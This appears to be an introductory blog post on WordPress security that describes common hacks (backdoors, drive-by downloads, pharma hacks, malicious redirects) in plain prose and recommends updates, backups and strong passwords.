WordPress runs 17% of websites worldwide or more than 700 million website (1). This makes it an extremely flexible and powerful too to get your website up and running; however, it also makes it a prime target for malicious attacks. No system is completely secure, and WordPress is certainly not an exception. My hope for this article is that it will provide a getting-started primer for making security improvements for your website.
We are going to cover:
But first, I am not a computer or website security expert, so these are best practices that I have learned from my experience in the WordPress community and by paying attention to articles such as the ones below. I want to make sure to give credit where it is due:
Smashing Magazine – Oct. 09, 2012 – Four Malware Infections in WordPress
Tuts Plus – Dec, 10, 2011 – 11 Quick tips for Securing your WordPress Site
WP Lift – Aug 22, 2012 – Strengthening Login Security WordPress
The largest risk to your website is that someone gains access to your username and password. With this information, they will be able to take control and install whatever they want. Common hacks related to someone gaining access to your site include (1):
- Backdoors: This is a result of a hacker gaining access to your server files, database or WordPress admin. Your site could also be compromised if the hacker gets access to another site on your shared server. Once in the hack can implement one of the following attacks or take over/down your website
- Drive-by Downloads: In this attack the hacker installs software on your website that prompts your users. It tells them they have been hacked and they need to install a security program (really a virus). The target here is your users, but your website is the vehicle.
- Pharma Hacks: Here the hacker takes over your site and injects spam links or content into your site. This content is conditionally served to your users and to Google risking your credibility and search ranking.
- Malicious Redirect: This is where the hacker just redirect traffic from your site (myawesomesite.com) to their site (evilhackersite.com) so that users never make it to your site, but are sent instead to a malicious site.
All of these hacks can be prevented or at least made less likely by making sure your WordPress core, plugins and themes are up-to-date and that you have frequent backups taken so you can recover if something should happen. The could also be caused by a poorly written theme or plugin that fails to prevent code injection. I could also be caused by weak passwords used by your users.